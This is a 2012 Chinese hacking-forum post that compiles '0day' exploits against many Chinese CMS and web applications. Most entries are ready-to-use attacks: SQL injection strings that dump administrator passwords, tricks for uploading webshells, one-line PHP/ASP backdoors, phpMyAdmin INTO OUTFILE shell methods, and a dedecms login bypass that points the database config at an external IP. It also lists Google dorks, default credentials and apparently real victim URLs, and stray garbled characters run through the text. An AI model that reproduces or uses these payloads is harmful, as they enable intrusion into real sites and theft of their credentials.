找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3060|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本4 o# m5 S. d$ n6 j

) A. F0 I3 c8 h( R  A! p" k直接上exploit:
) r; O6 R/ H# d; }" i5 k; W1 @javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
5 h5 o4 R- D* b# u8 D" Htest:http://www.tb11.net/system/xitong/shownews.asp?id=210
% Y* h, n3 Z& a) C' x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ W8 c4 ?% j7 w% Q  t1 q3 \# K
Asprain论坛 注册用户 上传图片就可拿到webshell
. e1 O, H: T" v0 ?! M% N2 [4 E" b! y! R3 y1 Z" r# N5 ~9 ]8 I
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 c, _5 L& K2 S% o6 Q) C" e8 {1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
- E+ j6 d7 g$ D# k: U: k$ h2.gif 为一小图片文件,一定要小,比如qq表情图片
+ U4 E4 B$ I7 c+ G# T+ q3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
- m, x/ M( H( h2 s4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了, [0 q; y5 U+ }0 A! t- v
5.q.asp;.gif
  H/ ]3 U1 |! s! a* \" {3 rgoogle:Powered by Asprain# E! @: J9 p+ J& x( j4 D% b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) I0 }2 _0 G6 u9 t1 x

! I3 {1 m5 }: w+ TShopNum1全部系统存在上传漏洞。3 F) g& }6 W7 e0 |4 G
1 r  Y$ P! y; Y6 m/ H
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
* r! U" i# P/ K2 f7 V/ y按说明 提示登录后台。。
. F( w& V% ?9 r; r. Q" y在后台功能页面->附件管理->附件列表
) _8 x  q9 F% k! W8 C可以直接上传.aspx 后缀木马
/ M" b: m3 L9 s- H6 Khttp://demo.shopnum1.com/upload/20110720083822500.aspx' ?5 w) g) U1 L! B& |  t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( d$ |. d9 K) K* F3 \! K

& F+ R! `3 Y# t9 {( h% H. v; g牛牛CMS中小企业网站管理系统 上传漏洞
$ u' p8 k! H$ _5 i3 i) f$ s* N0 x' \" _' @, }8 t. x  b" n5 a4 `
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。% _( W6 Q! P+ u# s2 }+ V
后台:admin/login.asp
: j5 D9 |4 M3 Q4 _9 h: W- Vewebeditor 5.5 Nday7 S" w+ h3 b7 b% E
exp:
8 |: x; m  Y" z<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?; A, m: L( N9 D% [
<input?type=file?name=uploadfile?size=100><br><br>?4 |8 s9 f# G( `1 j/ w  {( E
<input?type=submit?value=upload>?" {+ `) }& n6 y) e$ ]; ^
</form>
9 e5 t# A2 }, \ps:先上传小马.+ j; A- n5 [( d* ?4 k2 J
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
! d  E! ]* v) O6 }" z& u$ y2 ^& m  }
0 G+ a. _; R% `! H: Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ @' d1 Y( o! h6 g  k
* W# L" @1 k. w" l6 cYothCMS 遍历目录漏洞7 A& c2 e0 F' j% C8 z* m
; y. Y* L7 o9 s* Y# K
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。" }5 k. }$ ?+ q  {: h1 m) q7 S
默认后台:admin/login.asp1 r0 G$ l, B, T3 N" C$ l
遍历目录:
3 ]6 ?- A- P! j) u( n: U6 Yewebeditor/manage/upload.asp?id=1&dir=../
% r. x1 y) b5 G2 w0 G2 Q' gdata:! N) w+ I) m6 V
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
+ {+ x* z/ i9 A6 \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# h1 Z8 @) N6 }) w# ]3 N, p
6 ~/ s- J) e) X5 c& ]& _Net112企业建站系统 1.01 q" W% c2 ^3 V3 g# I9 R

4 c9 `0 ]) M: t源码简介:6 M5 A4 `+ R- k5 A5 C8 t+ j
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
0 O( D, V7 X6 D, |4 P6 x添加管理员:
7 Z  F0 f7 q/ [* |http://www.0855.tv/admin/admin.asp?action=add&level=2& u4 [8 C9 `* B* D) `* e
其实加不加都不是很重要,后台文件都没怎么作验证。9 r$ y8 y  H' H
上传路径:
: e! y" \8 G; K5 D; N& `* p2 Fhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
* Q" G( N, \* ahttp://www.0855.tv/inc/Upfile.asp?Stype=2
+ M3 N9 r! z9 B8 @/ G" b7 P3 z怎么利用自己研究。
, q' x8 R5 v0 O) N' y遍历目录:8 G  A4 _' q- h* W" z9 V- C
http://www.0855.tv/admin/upfile.asp?path=../..) ?7 K" h2 u  H% F: b
如:
: r9 J( G, D% \http://www.0855.tv/admin/upfile.asp?path=../admin
  l! l' {" b/ K2 N/ n  L6 Uhttp://www.0855.tv/admin/upfile.asp?path=../data
- T' L2 ]8 l8 X3 @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ L9 Q# H/ V- D, d0 x7 C6 U" [
& [4 b! |# J" x& n: @& b  V+ N3 T
易和阳光购物商城通杀 上传漏洞: W( u+ V9 R2 j: |5 z& {1 Q5 e2 d

: Q* l) h. s; O3 B  t前提要求是IIS6.0+asp坏境。0 a* f$ s: i  o4 y* g
漏洞文件Iheeo_upfile.asp ' Q4 l- y, S+ j6 N
过滤不严.直接可以iis6.0上传
, i, j: c; K( d$ n$ T把ASP木马改成0855.asp;1.gif' s4 A- V  N0 _$ s- N
直接放到明小子上传  N: T% k* T* z3 D# @1 Q
Google搜索:inurl:product.asp?Iheeoid=
: I3 x1 M  c  {8 y: I2 E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 q& o3 e: e+ l, s7 I- S! \
/ S, A  [0 Q% W% kphpmyadmin后台4种拿shell方法8 @+ o/ Q( n" o" D6 p* E& K7 J
9 _! @# Z/ ^: B% Y% ~# W
方法一:
3 Q) ^- i- X/ }CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
1 i$ `- H7 W1 F- Q3 U5 LINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 w% S8 K) R) ]9 OSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% l, e: S. W( N1 v/ @! _3 G1 o' |6 Q----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php$ \/ k: d4 M$ J4 r
一句话连接密码:xiaoma
7 N+ Y- X) j5 M5 A6 T方法二:
# F) z7 T+ U" V0 r- d8 C" n) KCreate TABLE xiaoma (xiaoma1 text NOT NULL);
9 W5 @. j. S' c$ V& U: pInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');  k# I& y7 t( N. N
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
4 y0 M0 U) o6 Y4 c- ]Drop TABLE IF EXISTS xiaoma;  t2 i/ C  e6 X9 {
方法三:
/ ~: P/ U& G0 z  F" o) S' ]读取文件内容:    select load_file('E:/xamp/www/s.php');
6 u% `) `" f+ o( q! q3 y+ |写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'2 s5 O( c- w0 N% h: P
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( {. S" P# l4 y, t方法四:
: f8 E. Z+ m: x3 eselect load_file('E:/xamp/www/xiaoma.php');* |$ |+ Q" X6 \$ t& p& P6 t& a! @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'4 Y9 U, C- ]7 T6 j- I
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir, E/ m1 F' [- y1 s! Y6 h/ q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 T1 [: C2 f: M+ T

: P& j  E" k$ U2 Y传信网络独立开发网站源码0day漏洞
9 H% F. T9 W' b/ l+ b0 |
; O3 {2 t3 i. b7 O* J, N9 X3 P后台system/login.asp
: G# m+ _" Q  t6 z9 U* Z/ K: W进了后台有个ewebeditor
  A, O2 C7 R, }. {$ a* b" sGoogle 搜索inurl:product1.asp?tyc=  N; p, O# O7 m) U
编辑器漏洞默认后台ubbcode/admin_login.asp. R2 Y9 f( `. y9 Q3 s4 ~
数据库ubbcode/db/ewebeditor.mdb9 Q6 s# I# ~6 u
默认账号密码yzm 1111111 ]7 ?0 [0 g5 ~4 q% N# w3 K

0 z: I' ~1 ^7 w! W: W, e- y拿webshell方法8 U: k! U& s" ]$ {) r
登陆后台点击“样式管理”-选择新增样式 9 o8 q7 u3 g+ o1 |% N2 w) d
样式名称:scriptkiddies 随便写 ! M: E' ^0 a# Q8 ^) @* F' o% W
路径模式:选择绝对路径
* p+ L* A7 e: `4 G/ L图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx& @7 u4 j5 U4 q( L
图片类型比如就是我们要上传的ASP木马格式
, g: u# ~# [% K7 v上传路径:/# o  d  y8 G/ l2 z8 {1 x
图片限制:写上1000 免的上不了我们的asp木马
/ _% ~! i7 M  i/ v7 t) i上传内容不要写
- h) U1 f/ z. {' `1 j8 X可以提交了
5 ]2 D" P# c" H' W$ o样式增加成功! $ R. y! p% A6 u3 ~, h- L
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 7 M5 h' Q" Z) r4 x" G# u
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置6 H7 ]# s: W5 M) J7 `
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies5 \( V  O2 E5 ~4 c6 }5 H; i9 r
上ASP木马 回车 等到路径( s, d& W6 x6 N: v  `

$ i- B( W% q; w+ O' d. W后台:system/login.asp
) Y- v, h6 f: o7 bExp:3 N( I1 g  S3 }( V5 F
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 k( W; m2 J$ s3 ?- e+ J测试:' O* y7 Q- V5 l6 a7 u
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
! c9 P2 S: W/ X1 d- _! D7 ~http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
6 _0 N% p) ]+ b; _% p6 [' J$ [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ C0 X0 {: r2 V4 t* O1 {) o+ j4 a8 e, k
foosun 0day 最新注入漏洞
7 |0 j5 T" e# E/ p+ j1 X) I0 f& c, x9 ]: W
漏洞文件:www.xxx.com/user/SetNextOptions.asp
8 r0 c1 {9 g) M' V& b利用简单的方法:1 Z! ^$ w2 G! Z5 k
暴管理员帐号:( C7 K5 X# @9 ~
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin- d3 i, f! s  B! f# O
暴管理员密码:% s/ W7 n) x- n* J6 L. i' x
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word," t/ a0 q7 f' \: E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! |8 z5 i0 X# s6 l% `: J( K
4 R! m) ~: i( Y7 }: P- _( m0 s5 r
网站程序的版权未知!& M: [. W& x2 j4 n
3 j3 F( f4 `' ^  D2 H3 o+ F: s
默认网站数据库:
& }6 Y/ _" M# V% {& Hwww.i0day.com/data/nxnews.mdb
# D  v$ w1 E: G4 f5 v9 Bewebeditor 在线编辑器:
, |: h% `1 b5 c( ^8 V6 @1 t0 U: z" [编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
' D9 V: T& F' @5 G6 f& v: o8 e: ^登录地址:ewebeditor/admin_login.asp
# f$ k! O' a6 h3 x5 X- I* Q默认密码:admin  admin" k* h" ]2 y1 N% i8 }
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data* b3 d; s0 d0 r/ N( N2 i  b
' g) Q$ i: o! K2 z2 g" W
Sql注入漏洞:+ k6 f+ j, l4 B$ Y- u
http://www.i0day.com/detail.asp?id=12
, j& |. l" V. _exp:
% p6 ?) A* L! L* ^4 aunion select 1,admin,password,4,5,6,7,8 from admin7 _  d8 b# D9 |$ R% F  T- e- y
爆出明文帐号/密码
8 ~0 ]* p1 v/ g" T) i* |( u* ^
* ~+ \4 @7 B. e: q& \: a7 r上传漏洞:
1 S4 q! M6 c5 V$ B' x& l后台+upfile.asp8 N4 l% P' [  s# o
如:* ^! C! L" U; L' K# Z- X: X/ \+ I/ b
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。4 `4 \- z" [3 Z6 O6 `6 d
shell的地址:网址+后台+成功上传的马! Y- L# g4 g8 Y1 y
google:inurl:news.asp?lanmuName=/ G6 j4 a- _/ F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 M; W, U9 M# k4 z7 [; q1 s7 l: x4 p
dedecms最新0day利用不进后台直接拿WEBSHELL
4 {5 S; `5 M+ h5 i; v7 y: a, @3 R* H' N+ a
拿webshell的方法如下:
8 Q8 Z; t9 `0 E3 u" }" h1 Q% F) H网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
  Y3 b* z6 B+ X/ k, ?前题条件,必须准备好自己的dede数据库,然后插入数据:1 b4 H' r) l" j6 |$ _
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ' `0 B. s3 \" }4 n! b
4 _' A9 @. U6 |+ E6 i7 [
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
4 O" y3 ]/ k3 k7 p1 q+ l<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
+ \7 s6 ^6 f/ E/ C" @) l' Q<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />7 R; [% `" _/ \0 q: v$ g
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
) l3 ~7 c+ }' v( z: r5 C<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 R9 R! k8 _' Q* q$ C8 U
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />0 |0 H7 W/ l5 r
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ u$ ~# F- H+ w$ o6 p<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />' G5 c4 ?: _' M3 O
<input type="text" value="true" name="nocache" style="width:400">
- z  D" G, Z& W<input type="submit" value="提交" name="QuickSearchBtn"><br />/ G( s3 n  l* m% M
</form>( g4 G3 H6 v  C4 W9 w- ?. S  \
<script>
7 q) Q+ Z7 r3 G4 K- Efunction addaction()2 ^  v4 D  E9 H, T5 X) ^
{$ y8 y, x; D1 g7 s, o7 B9 _# s
document.QuickSearch.action=document.QuickSearch.doaction.value;% O5 \+ [8 |2 ]
}
: B* e. k" z$ s+ l5 A( x</script>* M7 R# \% [% i4 C( l
-----------------------------------------------------------------------------------------------------------------------------------------------
. {: Z( z' K$ n" ?1 x% ?
& q) p9 W! ^1 p- ddedecms织梦暴最新严重0day漏洞
: P5 O+ ^! L1 A" vbug被利用步骤如下:; ]5 g. M7 g' d4 Y4 H7 y
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; }& k; N2 Z. p8 ^  {3 U1 E
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。: R, {. {& ?- z+ c
-------------------------------------------------------------------------------------------------------------------------------------------
6 t* i) Z- r  {, k9 |) _+ c! G0 ]6 j" k$ ~4 c
多多淘宝客程序上传漏洞 % o, E4 m/ g6 V9 Y
漏洞页面:: [: ?# G  Y  q1 ^; N4 ?$ _
admin\upload_pic.php
5 G/ \1 V1 x4 J+ z" ~传送门:
) |6 t% \. {1 a$ n. ~9 q/ vhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1( z5 `, ]8 U& Z) G$ ?9 I5 }
PS:copy张图片马 直接  xxx.php 上传抓包地址!
& G! G; J# b! _, I------------------------------------------------------------------------------------------------------------------------------------------------------
* h; @. R* Z0 K3 a- U4 g5 d
- h# j9 W- Z2 ^" g无忧公司系统ASP专业版后台上传漏洞
" w' k* j( n3 E* `$ \漏洞文件 后台上传
" n5 A1 V8 f  X1 z" uadmin/uploadPic.asp8 e* D  o2 q$ _4 J" e7 b
漏洞利用 这个漏洞好像是雷池的
9 t1 U& C, j7 }1 k! M$ O- O1 ihttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=10 u; o) n% R5 B) k
等到的webshell路径:2 W+ R7 V8 R. k
/UploadFiles/scriptkiddies.asp;_2.gif
- @* c" i: N: @% m0 A- R% x  H9 W---------------------------------------------------------------------------------------------------------------------------------------------------' ]  h0 x* [1 [3 T
2 M  J0 Q6 g  j9 _% T2 t
住哪酒店分销联盟系统20103 o% M: f  ]7 j3 M% Q
Search:0 q4 O9 U7 m" S8 U0 d$ |
inurl:index.php?m=hotelinfo
, Q6 h0 K# D4 N: `) a' \( r/ Lhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin# |9 g+ m6 f9 ~+ Q: A6 H# i! `% h
默认后台:index.php?m=admin/login- L" }: \% ]& ^6 B8 X1 H$ y' E
--------------------------------------------------------------------------------------------------------------------------------------------------$ U7 h6 B, x; O) B1 v" h$ Y. R# f
6 A1 m# ^8 [  {7 h+ }: B
inurl:info_Print.asp?ArticleID=8 S7 c# }2 e/ r. J, q: L) f
后台 ad_login.asp2 O* w0 z! B9 `8 B( C5 c
爆管理员密码:
! [! t& U, K. q. n# g. hunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
5 F5 M% }. [$ A+ z4 Q' c------------------------------------------------------------------------------------------------------------------------------------------------------------
. r1 j, q  T* M; ^: Z2 i* B2 Z( v2 _; h, v* o0 f& j+ i8 I
搜索框漏洞!: k* G4 N* p! {( B0 A5 s# h6 q$ `5 M
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
/ N* m" F+ B: M, g$ ^) S--------------------------------------------------------------------------------------------------------------------------------------------------------
. j  z4 @: r9 C! O; b1 r/ _7 D. U) Q3 e8 \1 Y2 v
关键字:2 T1 @8 P4 |: ?$ R3 T' l
inurl:/reg_TemletSel.asp?step=28 C/ `9 y' c! O9 \% G3 t
或者
# i. \6 v5 p+ e$ n6 i% H电子商务自助建站--您理想的助手, x$ R* u! z1 M' K7 G
-------------------------------------------------------------------------------------------------------------------------------------------------
; W! e; B" }4 [
/ ?" N& H8 X9 A" UiGiveTest 2.1.0注入漏洞' c- z, o, Y5 g8 x+ K8 n5 W- N6 E7 H
Version: <= 2.1.0
0 H* P: V! b* `& b  {# Homepage: http://iGiveTest.com/. A: R% S' I# R3 Q, u
谷歌关键字: “Powered by iGiveTest”$ ]- Q! D2 N  |, e9 u! C
随便注册一个帐号。然后暴管理员帐号和密码/ c& q9 I1 @7 |8 s" X* s; g/ g
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1* O& X8 o1 I" N, t# p
------------------------------------------------------------------------------------------------------------------------------------------------
( g  c3 ~" e5 \2 I) _
! D# `  \( O8 F1 S$ JCKXP网上书店注入漏洞
5 ^7 }1 a; f; l* O; _/ Z工具加表:shop_admin 加字段:admin
6 H% E0 B2 |3 i1 s: `后台:admin/login.asp ( }5 L$ Z5 z# z4 s+ f0 J3 g
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/4 J- m' ~' r( ?) b7 O" \8 r
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息/ \% `0 F  F& {/ {8 n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 {, `, `, s5 h' R) G5 [6 Y) U
$ s: C7 X9 V: f
段富超个人网站系统留言本写马漏洞
; L3 ?2 ?8 ]8 G源码下载:http://www.mycodes.net/24/2149.htm
9 L# M% T; Z$ @+ i! baddgbook.asp 提交一句话。
1 P7 x5 h1 r. w连接: http://www.xxxx.tv/date/date3f.asp
4 c8 W' n( @9 e, z% m. Z/ ^google:为防批量,特略!
9 j& B- S5 Q) s, K4 ]6 W: R-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 }1 E1 \' ?# P- l
; c0 E/ @3 c" r* @; O' ^/ S, S智有道专业旅游系统v1.0 注入及列目录漏洞4 ?2 D( F  P& j" i
默认后台路径:/admin/login.asp& \+ R2 S. C( Q0 ?, c- |
默认管理员:admin0 g/ i7 a1 a/ r* y( P1 H
默认密码:123456
9 L; r9 J/ k, X- C9 i3 FSQL EXP Tset:  X; {6 {! w& V
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin. I  e  _  l; }: g4 I; }
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ y) `1 T; V: e2 n- |3 E, v2 A/ s" K
4 m$ q7 o2 p/ C8 f" S. [ewebeditor(PHP) Ver 3.8 本任意文件上传0day
5 u8 o! n3 j# W" R" K  @3 O& cEXP:
7 k' U  L+ _, R4 z* f<title>eWebeditoR3.8 for php任意文件上EXP</title>  a6 V% D/ B! `% B8 z
<form action="" method=post enctype="multip6 }- f( q" E! ~
art/form-data">
, ]8 H" Q9 U! G( a9 O0 l; v<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
4 x& @6 L+ [" P# p) f; TURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
# {4 y. Z$ v  W4 m$ `<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> % {! ?: ~# v. T1 \" V
file:<input type=file name="uploadfile"><br> ) g* V, z0 ]3 a
<input type=button value=submit onclick=fsubmit()>
1 U5 v  a0 M- w/ q</form><br>
6 S: ^1 J1 m0 b$ e9 @. R<script>
- k4 c) w0 a" H  pfunction fsubmit(){
) A" ]7 H! D- F! Mform = document.forms[0];
0 Q6 |: ?4 h6 x1 W+ B& _! eform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 0 u: E% P" P7 O! {
alert(form.action); # B7 g+ X: v5 b, E, Z& Z6 s3 h
form.submit(); % E" F3 o0 o, P7 _# W
}
# L" U5 @' W! e5 a( o! C- ?3 G0 x</script>
' n% a' e0 q; t! j0 h/ T; u注意修改里面ewebeditor的名称还有路径。2 ?" g! O, N5 ?& t) X
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 M; @5 K6 y$ v. p9 }( n6 P) B( o7 R
' ]% ^8 A7 S* m& x! ?  m: e
提交’时提示ip被记录 防注入系统的利用  u% m5 c% B5 o; O$ c; N, \
网址:http://www.xxx.com/newslist.asp?id=122$ b: H" N& y4 r5 ^4 ?8 u  g
提示“你的操作已被记录!”等信息。
! E8 [9 f$ q2 Y  N利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
9 @6 d, A% Q2 l9 a1 \% A-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  V" L# ]/ M7 o1 ]# ]& M& k2 `6 W; Z" f2 W. x. i* Z
西部商务网站管理系统 批量拿shell-0day" w; x2 c; \3 E' H# H; q2 C
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 6 r& F) A# J# W. }3 v3 C/ T
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
! S) N" M9 l: C' t: W3 b2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合" Z# L' Q* O& T0 C2 y: E) {( P
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
9 L8 ~3 b( p) A8 H! [0 g---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ T. e- Z6 q% X; H/ d5 M& y& g
2 P: W; k6 s0 p/ Y1 X" e% q
JspRun!6.0 论坛管理后台注入漏洞5 D( u% {- F6 [9 b3 N/ U
/ `, F% y0 T# ^9 G6 S3 n" J
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:2 N( {4 U4 d+ P1 q5 Y
JspRun!6.0
; L- h3 X9 U% ~9 {1 t* @漏洞描述:- P! U9 }9 h5 N: L
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
) @! c! r4 {0 R在处理后台提交的文件中ForumManageAction.java第1940行! V. H% v& L5 j, H6 K3 S+ j
String export = request.getParameter("export");//直接获取,没有安全过滤+ n5 D7 c# K" `4 M: _1 A7 g
if(export!=null){
" k! |( q! U5 @, k$ M! mList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
7 {# m7 @8 A& J' _if(styles==null||styles.size()==0){
; }  w- ^) \2 N! x: u<*参考; o: A% \" A6 H# m* v/ m
nuanfan@gmail.com+ U- d5 q4 P6 a. @$ Y$ I
*> SEBUG安全建议:9 P( j+ x- e1 @# v( a
www.jsprun.net; ]6 F5 ]$ Z9 L# S8 B
(1)安全过滤变量export9 V5 X( o* s9 X2 t' c. c% M6 d
(2)在查询语句中使用占位符
( `! [( ]' a5 D6 @/ I9 E------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% k( P4 _% A- m3 |. V- b0 ~4 J
8 y4 c, Q) f1 B9 n7 r: N4 V0 I' o2 l5 `乌邦图企业网站系统 cookies 注入
4 X$ `: ?+ |" g
& J. A- F& F9 V2 `) ~. _程序完整登陆后台:/admin/login.asp9 ~5 y. I( V6 C" Z- z8 @
默认登陆帐号:admin 密码:admin8880 y. m4 t& `1 v- A" d; }; ~
语句:(前面加个空格)5 |6 U2 K8 ~1 |( x6 k6 P8 \! R
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
+ g0 s- d# C% J$ f2 e或者是16个字段:: |' x  m, V5 X
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
6 L0 e. Z9 R# `2 K& p. L7 ~1 A爆不出来自己猜字段。
! z8 k, W) p1 R1 M! G注入点:http://www.untnt.com/shownews.asp?=88' y& \( v, w% s/ e" p
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp6 u% i$ y5 Y' b1 j% N4 `
关键字:
, ?# O; q# f, p% ~- Z2 R& iinurl:shownews?asp.id=- L$ @7 J/ S: \/ `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ {# p! z6 k9 E- g1 e% ^7 b; a, m2 ~9 l5 H
CKXP网上书店注入漏洞
8 e  p& x3 E/ C( n5 L0 P& }3 t( u
: o0 Y( {' s3 T  O工具加表:shop_admin 加字段:admin
4 B! W* c4 I) @# a+ E5 x0 v后台:admin/login.asp
8 v% h/ R7 j/ u& W5 f登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
  }) a* I" I. h1 cinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
